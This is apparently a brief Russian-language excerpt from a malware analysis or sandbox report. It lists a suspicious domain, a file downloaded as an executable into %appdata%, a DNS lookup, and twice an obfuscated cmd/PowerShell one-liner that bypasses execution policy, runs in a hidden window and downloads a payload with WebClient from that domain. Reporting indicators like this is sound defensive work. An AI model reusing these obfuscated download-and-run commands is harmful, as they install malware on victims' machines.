Техническая информация
- http://dosehoop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^O^w^eR^ShE^Ll^.exE ^-^exE^cutiOnpolicy byPass -^NO^p^rO^F^ILE -wI^n^DO^Ws^TY^lE ^H^ID^D^E^n (NE^W-Obj^e^c^T^ sy^sT^Em.^N^eT.wE^B^Cl^i^EN^t).d^oWNL^Oa^D^fIL^E('http://do...
- DNS ASK do###oop.top
- '<SYSTEM32>\cmd.exe' /C "p^O^w^eR^ShE^Ll^.exE ^-^exE^cutiOnpolicy byPass -^NO^p^rO^F^ILE -wI^n^DO^Ws^TY^lE ^H^ID^D^E^n (NE^W-Obj^e^c^T^ sy^sT^Em.^N^eT.wE^B^Cl^i^EN^t).d^oWNL^Oa^D^fIL^E('http://do...' (со скрытым окном)